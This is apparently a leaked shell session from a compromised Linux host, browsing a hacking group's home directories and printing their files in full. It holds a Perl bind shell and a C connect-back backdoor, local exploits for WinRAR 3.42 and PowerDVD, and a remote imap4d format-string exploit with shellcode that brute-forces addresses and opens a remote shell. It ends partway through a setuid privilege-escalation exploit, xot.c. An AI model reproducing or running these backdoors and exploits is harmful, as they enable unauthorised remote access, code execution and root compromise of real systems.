#dk/archives #unlocked.(o/1043) #by: flsh #little taste of n0tm3.. Linux link 2.6.11-NX.2-link #3 SMP Sun May 29 00:47:02 MSD 2005 i686 i686 i386 GNU/Linux uid=1070(unl0ck) gid=600(customers) groups=99(nobody) $ echo diklined!@# diklined!@# $ pwd /home/u/unl0ck/ $ ls UnPack access_log access_log.1.gz chx lp m00-samba-pwnd.tar.bz2 photo priv8 public_html xtix $ cd xtix $ ls public_html $ cd public_html/ $ ls cgi-bin olly.jpg oplist.txt $ cat oplist.txt op list: A-WaRZ crash-x xtix linuxg0d n2n roberto_ rvr SpiderZ r-Master rD shellcode if i fogot sorry, tell A-WaRZ to tell me to add you. $ cd ../../ $ cd UnPack/ $ ls advisories larkit(priv8_in_progress).tar.gz tools $ ls * larkit(priv8_in_progress).tar.gz advisories: G00DTechTelnetD.txt editpad.txt htget.txt http_trace.txt letzdance.txt mollenftp.txt powerdvd.txt webx_lite.txt win_ftp.exe.txt winftp.txt zebedee.txt tools: b0f_research.rar search_in_files.pl $ cat advisories/ G00DTechTelnetD.txt editpad.txt htget.txt http_trace.txt letzdance.txt mollenftp.txt powerdvd.txt webx_lite.txt win_ftp.exe.txt winftp.txt zebedee.txt $ cat advisories/htget.txt htget-0.9.x stack overflow vulnerability number: #16 author: darkeagle mail: darkeagle [at] linkin-park [dot] cc || darkeagle [at] unl0ck [dot] org date: 01.12.04 vendor: dunno status: vendor dunno about bug :) overview: HTGET is a file grabber that will get files from HTTP servers. The aim behind this program is to create a downloader that you can leave running in the background - one that's totally reliable and can cope with just about any problem, and won't stop downloading unless it's forced to. details: ... } else if ( strncasecmp ( argv [ I ] , "--downloadsdir=" , 15 ) == 0 ) { strcpy ( DownloadsDir , & argv [ I ][ 15 ] ) ; ... solution: use wget :) exploit: lame local r00t xpl you can find there. greetz: all unl0ckerz, nosystemz, ghc'z (c) uKt Research 2004-2005 http://unl0ck.org $ ls advisories larkit(priv8_in_progress).tar.gz tools $ cat advisories/G00DTechTelnetD.txt GoodTech Telnet Server <= latest version DoS vulnerability number: #20 author: darkeagle mail: darkeagle [at] linkin-park [dot] cc || darkeagle [at] unl0ck [dot] org date: 16.03.05 vendor: http://asus.com $ ls tools/ b0f_research.rar search_in_files.pl $ cd tools/ $ ls b0f_research.rar search_in_files.pl $ cat search_in_files.pl #!/usr/bin/perl ###################................. ## Script for search in # files by keyword # (c) .uKt Research 2005 # http://www.unl0ck.org # nekd0@unl0ck.org ###################................. print "Please type logfile name \n(if file exists,all data will be removed) : "; chomp($log=); open (LOG,">$log") or die("Can't open log file.\n"); print "Please type path to directory (e.q. /home/nekd0) : "; chomp($start=); print "Searching for text files in $start\t\t\t\t"; @files=split(/\n/,`ls -F $start`) or die(); foreach $file(@files) {$pathtofile="$start/$file"; if (-d $pathtofile){push (@globaldirs,$pathtofile);} if (-T $pathtofile){push (@txt,$pathtofile);}} foreach $filename(@globaldirs){ @files=split(/\n/,`ls -F $filename`); foreach $file(@files) {$file="$filename$file"; if (-d $file){push (@globaldirs,$file);} if (-T $file){push(@txt,$file)} } } print "[ OK ]\n"; print "Please type key for serach (e.q. strcpy) : "; chomp($need=); print "Searching for $need in finded text files"; print "\t\t\t\t"; foreach $txt(@txt) { open(CAT,$txt); @file_cont=; close(CAT); $count=0; foreach $line(@file_cont) {$count++; if ($line=~/$need/) {print LOG "File : $txt\nOn line $count founded $line\n";} } } close(LOG); print "[ OK ]\n"; $ cd ../../ $ cd chx/public_html/ $ ls UnBotX Unreal3.2.3.tar.gz bs.pl.txt cbd.c cgi-bin choix.css chx.png example.conf img index.htm $ cat bs.pl.txt use Socket; $port = 31337; socket (S,PF_INET,SOCK_STREAM,getprotobyname('tcp')); setsockopt (S, SOL_SOCKET, SO_REUSEADDR,1); bind (S, sockaddr_in ($port, INADDR_ANY)); listen (S, 50); while (1){ accept (X, S); if (!($pid = fork)){ if(!defined $pid){exit(0);} open STDIN,"<&X"; open STDOUT,">&X"; open STDERR,">&X"; exec("/bin/bash -i"); close X;}} $ cat cbd.c /* Digit-Labs Connect-Back Backdoor * * Use this backdoor to access * machines behind firewalls. * * step 1. setup a listening port * on your box e.g. * nc -l -p 4000 * * step 2. Run this file : * ./cbd * * grazer@digit-labs.org * http://www.digit-labs.org * */ #include #include #include #include #include #include #include int fd, sock; int port = 4000; struct sockaddr_in addr; char mesg[] = "\n[ Digit-Labs Connect-Back Backdoor ]\n * Connected to CommandLine... \n"; char shell[] = "/bin/sh"; int main(int argc, char *argv[]) { while(argc<2) { fprintf(stderr, "\n\n %s \n\n", argv[0]); exit(0); } addr.sin_family = AF_INET; addr.sin_port = htons(port); addr.sin_addr.s_addr = inet_addr(argv[1]); fd = socket(AF_INET, SOCK_STREAM, 0); connect(fd, (struct sockaddr*)&addr, sizeof(addr)); send(fd, mesg, sizeof(mesg), 0); dup2(fd, 0); // thnx dvorak dup2(fd, 1); dup2(fd, 2); execl(shell, "in.telnetd", 0); close(fd); return 1; } $ ls UnBotX Unreal3.2.3.tar.gz bs.pl.txt cbd.c cgi-bin choix.css chx.png example.conf img index.htm $ cd ../../ $ ls lp/public_html/ aa cgi-bin config.h darkircd-1.0b3FINAL-2.tar.gz exp.html ircd.conf mafaka.html mustdie.lnk ppp.hta stdexe.rar stdsource.rar webalizer xoce.html y0.exe $ ls lp/public_html/* lp/public_html/config.h lp/public_html/exp.html lp/public_html/mafaka.html lp/public_html/ppp.hta lp/public_html/stdsource.rar lp/public_html/y0.exe lp/public_html/darkircd-1.0b3FINAL-2.tar.gz lp/public_html/ircd.conf lp/public_html/mustdie.lnk lp/public_html/stdexe.rar lp/public_html/xoce.html lp/public_html/aa: ppp.hta lp/public_html/cgi-bin: php5.cgi lp/public_html/webalizer: ctry_usage_200503.png ctry_usage_200505.png daily_usage_200503.png daily_usage_200505.png hourly_usage_200503.png hourly_usage_200505.png index.html usage.png usage_200504.html usage_200506.html webalizer.current ctry_usage_200504.png ctry_usage_200506.png daily_usage_200504.png daily_usage_200506.png hourly_usage_200504.png hourly_usage_200506.png update.php usage_200503.html usage_200505.html webalizer.conf webalizer.hist $ cd priv8/ $ ls paperz xplz $ cd paperz/ $ ls G00DTechTelnetD.txt htget.txt letzdance.txt powerdvd.txt zebedee.txt $ cat * GoodTech Telnet Server <= latest version DoS vulnerability number: #20 author: darkeagle mail: darkeagle [at] linkin-park [dot] cc || darkeagle [at] unl0ck [dot] org date: 16.03.05 vendor: http://asus.com htget-0.9.x stack overflow vulnerability number: #16 author: darkeagle mail: darkeagle [at] linkin-park [dot] cc || darkeagle [at] unl0ck [dot] org date: 01.12.04 vendor: dunno status: vendor dunno about bug :) overview: HTGET is a file grabber that will get files from HTTP servers. The aim behind this program is to create a downloader that you can leave running in the background - one that's totally reliable and can cope with just about any problem, and won't stop downloading unless it's forced to. details: ... } else if ( strncasecmp ( argv [ I ] , "--downloadsdir=" , 15 ) == 0 ) { strcpy ( DownloadsDir , & argv [ I ][ 15 ] ) ; ... solution: use wget :) exploit: lame local r00t xpl you can find there. greetz: all unl0ckerz, nosystemz, ghc'z (c) uKt Research 2004-2005 http://unl0ck.org winrar <= 3.42 (latest) stack overflow vulnerabilities number: #17 author: darkeagle mail: darkeagle [at] linkin-park [dot] cc || darkeagle [at] unl0ck [dot] org date: 06.03.05 vendor: http://rarlabs.com status: vendor dunno about bug :) overview: winrar is one of the best file compressor all over the world :) details: winrar has vulnerability, when user openning very long filename. to overwrite EIP register, needs 509 bytes ( RUS version ). another stupid stack overflow exist in winrar :) when you create archive, put in "Archive name" following: "uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu....\unl0ck.rar" 0x55 bytes over 500 :) but if you put only filename like "unl00.....00ckkkkkkkkkkk.rar" winrar msgz to you msg like "What The Fuck? Filename is t00 long!!!" :) rarlabs thought that they can fuck up stupidz userz. yes. they fucked upped stupidz userz with this protection, but UNL0CK RESEARCHERZ isn't stupidz userz! }:i solution: waiting new version of WinRAR program :) exploit: exploitz see here. I used ret-2-func technique in my exploit and it tested only in WinXP SP2 RUS. greetz: all unl0ckerz, nosystemz, rosielloz, m00z, skew. (c) uKt Research 2004-2005 http://unl0ck.org powerdvd-asusdvd 4.0 (maybe others) number: #18 author: darkeagle mail: darkeagle [at] linkin-park [dot] cc || darkeagle [at] unl0ck [dot] org date: 01.03.05 vendor: (?) overview: PowerDVD is powerfull DVD video player. details: simple stack overflow was founded when PowerDVD opens very long filename. exploit: PoC exploit is avaible from our site [ http://unl0ck.org ] Exploit gives to you local shell (cmd.exe). Tested on winxp sp0 rus with asusdvd 4.0. greetz: choix, nekd0, nosystemz, antiq, cr0n, edisan, forsyte, xtix, crash-x, rave (c) uKt Research 2004-2005 http://unl0ck.org zebedee <= latest version stack overflow number: #19 author: darkeagle mail: darkeagle [at] linkin-park [dot] cc || darkeagle [at] unl0ck [dot] org date: xx.01.05 vendor: http://asus.com $ cd .. $ ls paperz xplz $ cd xplz/ $ ls 0xLeTzDanCe.c 0xLeTzDanCeeng.c 0xLeTzDanCerus.c 0xletzdance.rar UNL0CK.txt imap4d.c pdvdx.cpp shoutdead.c un-D_0WNED.exe undee.c unreal.c xot.c 0xLeTzDanCe.exe 0xLeTzDanCeeng.exe 0xLeTzDanCerus.exe Ie-0day2.zip ie_0day m00seahouse-0.1.tar.gz priv8.tar.gz un-D_0WNED.c undead.c unreal-DOS.rar unxpcd.c $ cat 0xLeTzDanCe.c /* local exploit for winrar <= 3.42 Universal Dir\Filename bug by darkeagle bug is 0day :) was founded by darkeagle i'm used ret-2-func technique. */ #include #include #include int main () { long sys_addr = 0x77C18044; // winxp sp0 rus targets... long exit_addr = 0x77C27ADC; long cmd_addr = 0x77C01335; FILE *file; char buf[3000]; char cmd[3000]; printf("\n * 0xLeTzDanCe - WinRAR <= 3.42 local exploit *\n * by darkeagle [http://unl0ck.void.ru]\n *\n\n"); file = fopen("UNL0CK.txt", "w+"); memset(buf, 0x00, 3000); memset(cmd, 0x00, 3000); memset(buf, 0x55, 527); *(long*)&buf[strlen(buf)] = sys_addr; *(long *)&buf[strlen(buf)] = exit_addr; *(long *)&buf[strlen(buf)] = cmd_addr; fprintf(file, "%s\n", buf); fclose(file); } $ cat 0xLeTzDanCeeng.c /* local exploit for winrar <= 3.42 ENG version by darkeagle bug is 0day :) was founded by darkeagle i'm used ret-2-func technique. */ #include #include #include int main ( int argc, char *argv[] ) { long sys_addr = 0x77C18044; // winxp sp0 rus targets... long exit_addr = 0x77C27ADC; long cmd_addr = 0x77C01335; char buf[3000]; char cmd[3000]; if ( argc < 2 ) { printf("\n * 0xLeTzDanCe - WinRAR <= 3.42 local exploit ENG version *\n * by darkeagle [http://unl0ck.void.ru]\n * usage: 0xletzdance.exe \n\n"); exit(0); } memset(buf, 0x00, 3000); memset(cmd, 0x00, 3000); memset(buf, 0x55, 516); *(long*)&buf[strlen(buf)] = sys_addr; *(long *)&buf[strlen(buf)] = exit_addr; *(long *)&buf[strlen(buf)] = cmd_addr; sprintf(cmd, "%s %s", argv[1], buf); system(cmd); } $ cat 0xLeTzDanCerus.c /* local exploit for winrar <= 3.42 RUS version by darkeagle bug is 0day :) was founded by darkeagle i'm used ret-2-func technique. */ #include #include #include int main ( int argc, char *argv[] ) { long sys_addr = 0x77C18044; // winxp sp0 rus targets... long exit_addr = 0x77C27ADC; long cmd_addr = 0x77C01335; char buf[3000]; char cmd[3000]; if ( argc < 2 ) { printf("\n * 0xLeTzDanCe - WinRAR <= 3.42 local exploit RUS version *\n * by darkeagle [http://unl0ck.void.ru]\n * usage: 0xletzdance.exe \n\n"); exit(0); } memset(buf, 0x00, 3000); memset(cmd, 0x00, 3000); memset(buf, 0x55, 509); *(long*)&buf[strlen(buf)] = sys_addr; *(long *)&buf[strlen(buf)] = exit_addr; *(long *)&buf[strlen(buf)] = cmd_addr; sprintf(cmd, "%s %s", argv[1], buf); system(cmd); } $ cat UNL0CK.txt UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUD?w?z?w5?w $ cat imap4d.c #include #include #include #include #include #include #include #include #include #include //#define DEBUG #define RETADDR (0x805d922) #define SHELL_PORT "34563" #define SHELL_COMMAND "uname -a; id;" #define PORT_OFFSET 20 #define ARG_1_LENGH 180 #define ARG_3_LENGH 315 char shellcode[] = "\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66\xcd" "\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89\xe1\x6a" "\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89\x44\x24\x04" "\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43\xb0\x66" "\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75" "\xf6\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3" "\x52\x53\x89\xe1\xb0\x0b\xcd\x80"; void prepare(char *arg){ int port=htons(atoi(arg)), p1, p2; p2 = (port & 0xff00) >> 8; p1 = (port & 0x00ff); shellcode[PORT_OFFSET] = p1; shellcode[PORT_OFFSET+1] = p2; printf("Shellcode lenght=%d; port=%d\n", strlen(shellcode), atoi(arg)); } struct framep { int addr; unsigned short dpa_offset; }; struct targ{ unsigned int retloc; /* the eip */ /* * possible retaddrs, we have to bruteforce a * little bit to find the username field on heap */ int pretaddr[10]; int ret_count; struct framep ebps[8]; int ebp_count; int use_ebp1; int use_ebp2; unsigned short ebp1_offset; /* DPA offset of the first ebp */ unsigned short ebp2_offset; unsigned short retl_high_offset; /* DPA offset of high part of the retloc */ unsigned short retl_low_offset; } target; void usage(char *a){ int i; printf("[-] Usage: %s -h [options]\n", a); printf("[!] Options:\n"); printf("\t\t-h\tHostname which you want attack (required)\n"); printf("\t\t-p\tPort of the imapd (default: 143)\n"); printf("\t\t-s\tHow long to sleep before try connect to shell (default: 1)\n"); exit(1); } int sockprintf(int sock, const char *s, ...){ char *ptr; int bytes; va_list arg; va_start(arg, s); if(vasprintf(&ptr, s, arg) == -1){ free(ptr); return -1; } va_end(arg); if((bytes = send(sock, ptr, strlen(ptr), 0)) == -1){ free(ptr); return -1; } free(ptr); return bytes; } int statusf(const char *s, ...){ va_list arg; va_start(arg, s); vprintf(s, arg); fflush(stdout); } int resolv(struct sockaddr_in *addr, char *hostn){ struct hostent *host; if (!inet_aton(hostn, &addr->sin_addr)){ host = gethostbyname(hostn); if (host == NULL){ printf("[-] Wasnt able to resolve %s!\n", hostn); return -1; } addr->sin_addr = *(struct in_addr*)host->h_addr; } } int conn(struct sockaddr_in addr, int port){ int sock; if((sock = socket(PF_INET, SOCK_STREAM, 0)) == -1){ return -1; } addr.sin_port = htons(port); addr.sin_family = AF_INET; if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){ return -1; } return sock; } int get_shell(struct sockaddr_in addr, int port, int sleeps){ int sock; char buffer[1024]; fd_set fds; sleep(sleeps); if((sock = conn(addr, port)) == -1) return (-1); printf("[+]\n[+] Wooohooo we got a shell!\n"); sockprintf(sock, SHELL_COMMAND"\r\n"); while(1){ FD_ZERO(&fds); FD_SET(0, &fds); FD_SET(sock, &fds); if (select(255, &fds, NULL, NULL, NULL) == -1){ fprintf(stderr,"[-] sending failed\n"); close(sock); exit(1); } memset(buffer, 0x0, sizeof(buffer)); if (FD_ISSET(sock, &fds)){ if (recv(sock, buffer, sizeof(buffer), 0) == -1){ fprintf(stderr, "[-] Connection closed by remote host!\n"); close(sock); exit(1); } fprintf(stderr, "%s", buffer); } if (FD_ISSET(0, &fds)){ read(0, buffer, sizeof(buffer)); write(sock, buffer, strlen(buffer)); } } return 0; } void status(int retloc, int retloc2, int retaddr){ static int i=1; switch(i){ case 1: printf("[|] "); break; case 2: printf("[/] "); break; case 3: printf("[-] "); break; case 4: printf("[\\] "); i = 0; break; } printf("Trying retlocs [0x%x - 0x%x] retaddr [0x%x]\r", retloc, retloc2, retaddr); fflush(stdout); i++; } void gen_req2(char *buffer, unsigned int size, unsigned short count){ unsigned short high, low; high = (target.pretaddr[count] & 0xffff0000) >> 16; low = (target.pretaddr[count] & 0x0000ffff); memset(buffer, 0x0, size); snprintf(buffer, size, "%%.%uu%%%d$hn%%.%uu%%%d$hn", high, target.retl_high_offset, (low-high), target.retl_low_offset, shellcode); buffer[size-1] = 0x0; if(strlen(buffer) > 135){ printf("[-] get_info failed, this really shouldnt happen...\n"); exit(-1); } memset(buffer + strlen(buffer), 0x41, 135 - strlen(buffer)); strncat(buffer, " LOGIN ", size - strlen(buffer) - 1); memset(buffer + strlen(buffer), 0x90, 353); if(strlen(shellcode) > 350){ printf("[-] The shellcode (%d bytes) is too big, maximal size is 350\n", strlen(shellcode)); exit(-1); } memcpy(buffer + strlen(buffer) - strlen(shellcode) - 2, shellcode, strlen(shellcode)); buffer[strlen(buffer)] = ' '; strncat(buffer, "BBBB", size - strlen(buffer) - 1); } void gen_req1(char *buffer, unsigned int size){ unsigned short retl; retl = (target.retloc & 0x0000ffff); memset(buffer, 0x0, size); snprintf(buffer, size, "%%.%uu%%%d$hn__%%%d$hn", retl, target.ebps[target.ebp_count - 2].dpa_offset, target.ebps[target.ebp_count - 1].dpa_offset); buffer[size-1] = 0x0; if(strlen(buffer) > 135){ printf("[-] get_info failed, this really shouldnt happen, wtf did you do?\n"); exit(-1); } memset(buffer + strlen(buffer), 0x41, ARG_1_LENGH - strlen(buffer)); strncat(buffer, " LOGIN ", size - strlen(buffer) - 1); memset(buffer + strlen(buffer), 0x41, ARG_3_LENGH); strncat(buffer, " BBBB", size - strlen(buffer) - 1); } void gen_info_req(char *buffer, unsigned int size, int offset){ int i; memset(buffer, 0x0, size); if(offset == 0) for(i = 0; i < 60; i++) strncat(buffer, "_%p", size - strlen(buffer) - 1); else for(i = 0; i < 30; i++) snprintf(buffer + strlen(buffer), size - strlen(buffer), "_%%%d$p", offset+i); strncat(buffer, " LOGIN ", size - strlen(buffer) - 1); memset(buffer + strlen(buffer), 0x41, ARG_3_LENGH); strncat(buffer, " BBBB", size - strlen(buffer) - 1); } void get_infos(int sock){ char buffer[1024], ibuffer[1024], *ptr, *ptr2; int i, j, bytes, ebp_count, ebps[10], ebp_tmp, offset, ret_tmp; gen_info_req(ibuffer, sizeof(ibuffer), 0); #ifdef DEBUG printf("[D] Sending: %s\n", ibuffer); #endif if(sockprintf(sock, "%s\r\n", ibuffer) == -1){ printf("[-] Wasnt able to determine infos\n"); exit(-1); } if((bytes = recv(sock, buffer, sizeof(buffer) - 1, 0)) == -1){ printf("[-] Wasnt able to determine infos\n"); exit(-1); } buffer[bytes] = 0x0; #ifdef DEBUG printf("[D] Recived: %s\n", buffer); #endif memset(&target, 0x0, sizeof(target)); ptr = buffer; for(i = 1; (ptr = strchr(ptr, '_')); i++){ ptr++; if(!strncmp(ptr, "0xbfff", 6) && target.ebp_count < 8){ ebp_tmp = strtoul(ptr,NULL,0); if(!(ptr = strchr(ptr, '_'))){ i++; continue; } ptr++; i++; if(strncmp(ptr, "0x80", 4) && strncmp(ptr, "0x080", 5) && strncmp(ptr, "0x40", 4) && strncmp(ptr, "0x040", 5)) continue; for(j = 0; j < target.ebp_count; j++) if(target.ebps[j].addr == ebp_tmp) ebp_tmp = 0x0; if(ebp_tmp == 0x0) continue; target.ebps[target.ebp_count].addr = ebp_tmp; target.ebps[target.ebp_count].dpa_offset = i - 1; #ifdef DEBUG printf("[D] Found possible ebp: %p offset: %d\n", target.ebps[target.ebp_count].addr, target.ebps[target.ebp_count].dpa_offset); #endif target.ebp_count++; continue; } /* * In the function util_do_command a pointer to the username is stored. username * points to the second "word" of the string which we send. if we send always a * string and with 4 "words", which have in each request the same lengh, * (word 1: 135bytes, string " LOGIN ", word 3: 353 bytes and word 4: 4 bytes, * we will get always the same chunk of memory from malloc. So the address where * username points to will always point to our 3. word, which will be in the last * request our shellcode. * The problem is, we know only that our string is on the heap, but there are a lot * of pointers to addresses that could be the heap. so we just copy the first 10 pointers * to 0x80* and try later each of them. bruteforcing 10 addresses wont take too long, * But it will flood the logs :/ */ if(target.ret_count < 10 && !strncmp(ptr, "0x80", 4) || !strncmp(ptr, "0x080", 5)){ ret_tmp = strtoul(ptr,NULL,0); for(j = 0; j < target.ret_count; j++) if(target.pretaddr[j] == ret_tmp) ebp_tmp = 0x0; if(ebp_tmp == 0x0) continue; target.pretaddr[target.ret_count] = ret_tmp; #ifdef DEBUG printf("[D] Added %p to the possible retaddr table\n", target.pretaddr[target.ret_count]); #endif target.ret_count++; } } target.retloc = target.ebps[0].addr + 4; target.use_ebp1 = target.ebp_count - 2; target.use_ebp2 = target.ebp_count - 1; #ifdef DEBUG printf("[D] retloc: %p\n", target.retloc); #endif /* * when we send this, the first two bytes of where target.ebp1 und target.ebp2 point to * will be overwritten with the first to bytes of target.retloc and target.retloc+2. * These can later be used to overwrite the saved eip of util_do_commands. */ gen_req1(buffer, sizeof(buffer)); #ifdef DEBUG printf("[D] Press enter to continue\n"); getchar(); #endif sockprintf(sock, "%s\r\n", buffer); #ifdef DEBUG printf("[D] Sent: %s\n", buffer); #endif memset(buffer, 0x0, sizeof(buffer)); while((bytes = recv(sock, buffer, sizeof(buffer) - 1, 0))){ buffer[bytes] = 0x0; if(strstr(buffer, "\r\n")) break; } for(i = 0, offset = target.ebps[target.ebp_count - 2].dpa_offset; i < 4; i++){ gen_info_req(ibuffer, sizeof(ibuffer), offset); sockprintf(sock, "%s\r\n", ibuffer); #ifdef DEBUG printf("[D] Sent ibuf: %s\n", ibuffer); #endif if((bytes = recv(sock, buffer, sizeof(buffer) - 1, 0)) == -1){ printf("[-] Wasnt able to determine infos\n"); exit(-1); } buffer[bytes] = 0x0; #ifdef DEBUG printf("[D] Recived ibuf: %s\n", buffer); #endif ptr = buffer; for(j = 1; (ptr = strchr(ptr, '_')); j++){ ptr++; if(target.retl_low_offset == 0 && strtoul(ptr, NULL, 0) == target.retloc) target.retl_low_offset = j + offset - 1; else if(target.retl_high_offset == 0&& strtoul(ptr, NULL, 0) == target.retloc + 2 ) target.retl_high_offset = j + offset - 1; } #ifdef DEBUG printf("rl low: %d rl high %d\n", target.retl_low_offset, target.retl_high_offset); #endif if(target.retl_low_offset != 0 && target.retl_high_offset != 0) break; offset += 30; } if(target.retl_low_offset == 0 || target.retl_high_offset == 0){ printf("[-] Wasnt able to find retloc on stack\n"); exit(-1); } #ifdef DEBUG printf("[D] Retloc low offset: %d Retloc high offset: %d\n", target.retl_low_offset, target.retl_high_offset); #endif } int main(int argc, char **argv){ char *payload = NULL, *hostn = NULL, buffer[1024], *ptr; int i, first, sock, opt, port = 143, shell_port = atoi(SHELL_PORT), sleeps = 1, p_size=10000, vulncheck = 1, bytes; fd_set fds; struct sockaddr_in addr; int p1, p2, ip1, ip2, ip3, ip4, sport; char *back = "192.168.1.2"; sport = atoi(SHELL_PORT); printf("[!] mailutils imapd4d universal(?) exploit 0.5 by crash-x / unl0ck / scozar\n"); if (argc < 2) usage(argv[0]); while ((opt = getopt (argc, argv, "h:p:t:s:P:S:c:vV")) != -1){ switch (opt){ case 'h': hostn = optarg; break; case 'p': port = atoi(optarg); if(port > 65535 || port < 1){ printf("[-] Port %d is invalid\n",port); return 1; } break; case 's': sleeps = atoi(optarg); break; case 'P': prepare(optarg); break; case 'c': back = optarg; break; case 'V': vulncheck = 0; break; default: usage(argv[0]); } } if(hostn == NULL) usage(argv[0]); resolv(&addr, hostn); printf("[!] Connecting to %s\n", hostn); if((sock = conn(addr, port)) == -1){ printf("[-] Connecting failed!\n"); return -1; } printf("[+] Connected!\n"); recv(sock, buffer, sizeof(buffer), 0); get_infos(sock); printf("[+] We got all infos, which we need, lets start!\n"); close(sock); for(i = 0; i < target.ret_count; i++) { statusf("[%d] Trying retaddr %p\r", i+1, target.pretaddr[i]); if((sock = conn(addr, port)) == -1){ printf("[-] Connecting failed!\n"); return -1; } if(!(bytes = recv(sock, buffer, sizeof(buffer), 0))){ printf("[-] Wasnt able to recive data from server\n"); exit(-1); } gen_req1(buffer, sizeof(buffer)); sockprintf(sock, "%s\r\n", buffer); while((bytes = recv(sock, buffer, sizeof(buffer) - 1, 0)) > 0){ buffer[bytes] = 0x0; if(strstr(buffer, "\r\n")) break; } gen_req2(buffer, sizeof(buffer), i); #ifdef DEBUG printf("[D] Press enter to continue\n"); getchar(); #endif sockprintf(sock, "%s\r\n", buffer); while((bytes = recv(sock, buffer, sizeof(buffer) - 1, 0)) > 0){ buffer[bytes] = 0x0; if(strstr(buffer, "\r\n")) break; } #ifdef DEBUG printf("[D] Press enter to continue\n"); getchar(); #endif close(sock); get_shell(addr, 5074, 1); } printf("[-] Exploit failed\n"); return 0; } $ cat pdvdx.cpp /* \ PowerDVD <= 4.? local win32 exploit / exploited by darkeagle, discovered by darkeagle \ / PoC exploit runs cmd.exe on WinXP SP0 Rus \ Using ret2func technique :) / \ greetz: unl0ckerz { nekd0, xtix, crash-x, choix, antiq, 8ron, 0xdeadbabe }, CoKi, rave etc. / \ mailto: darkeagle [at] unl0ck [dot] org / darkeagle [at] linkin-park [dot] cc \ http://unl0ck.org / \ */ #include #include #include int main(int argc, char *argv[]) { char cmd[500]; char *path; printf("\n\n* PowerDVD <= 4.0 local exploit *\n\tby darkeagle\n\nusage: pdvdx.exe \n\n"); if ( argc < 2 ) { printf(" need an argument!\n"); exit(0); } path = argv[1]; sprintf(cmd, "%s ", path); strcat(cmd, "\x44\x80\xC1\x77"); strcat(cmd, "\xDC\x7A\xC2\x77"); strcat(cmd, "\x35\x13\xC0\x77"); memset(cmd+strlen(cmd), 0x55, 299); system(cmd); exit(0); } $ cat xot.c #include #include #include #include #include #include #include #include #include #include #define PSIZE 0x1000 #define PCOUNT 0x00000001 #define SIZE PCOUNT*PSIZE #define SUID "/usr/sbin/traceroute" #define ARG "yahoo.com" struct s_suids { char *file; }; struct s_suids suids[] = { {"/usr/bin/at"}, {"/usr/bin/atq"}, {"/usr/bin/atrm"}, {"/usr/bin/batch"}, {"/usr/bin/chpass"}, {"/usr/bin/chfn"}, {"/usr/bin/chsh"}, {"/usr/bin/ypchpass"}, {"/usr/bin/ypchfn"}, {"/usr/bin/ypchsh"}, {"/usr/bin/keyinfo"}, {"/usr/bin/keyinit"}, {"/usr/bin/lock"}, {"/usr/bin/login"}, {"/usr/bin/passwd"}, {"/usr/bin/yppasswd"}, {"/usr/bin/quota"}, {"/usr/bin/rlogin"}, {"/usr/bin/rsh"}, {"/usr/bin/su"}, {"/usr/bin/crontab"}, {"/usr/bin/lpq"}, {"/usr/bin/lpr"}, {"/usr/bin/lprm"}, {"/usr/bin/k5su"}, {"/usr/libexec/sendmail/sendmail"}, {"/usr/libexec/uucp/uucico"}, {"/usr/libexec/uucp/uuxqt"}, {"/usr/sbin/mrinfo"}, {"/usr/sbin/mtrace"}, {"/usr/sbin/sliplogin"}, {"/usr/sbin/timedc"}, {"/usr/sbin/traceroute"}, {"/usr/sbin/traceroute6"}, {"/usr/sbin/ppp"}, {"/usr/sbin/pppd"}, {"/usr/src/usr.sbin/cron/crontab/crontab"}, {"/usr/X11R6/bin/xterm"}, {"/usr/home/bww/shell/sh"}, {"/bin/rcp"}, {"/sbin/ping"}, {"/sbin/ping6"}, {"/sbin/route"}, {"/sbin/shutdown"}, {NULL,} }; #define SLIPTIME 5 #define PATT_SIZE 16 #define MAP_NOPAGE 1 #define MAP_ISPAGE 2 char sush[]= "\x7f\x45\x4c\x46\x01\x01\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00" "\x02\x00\x03\x00\x01\x00\x00\x00\x54\x80\x04\x08\x34\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00\x00" "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08" "\x00\x80\x04\x08\x5c\x00\x00\x00\x5c\x00\x00\x00\x05\x00\x00\x00" "\x00\x00\x00\x00\x31\xc0\x50\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50" "\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50" "\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"; extern int errno; jmp_buf jmp; struct sigaction osigbus,osigsegv; void sigsegv(int signo, siginfo_t * si, void * ptr) { int error_code = MAP_NOPAGE; longjmp(jmp, error_code); } void prepare(void) { struct sigaction sa; sa.sa_sigaction = sigsegv; sa.sa_flags = SA_SIGINFO | SA_NODEFER; sigemptyset(&sa.sa_mask); sigaction(SIGBUS, &sa, &osigbus); sigaction(SIGSEGV,&sa, &osigsegv); } void unprepare(void) { 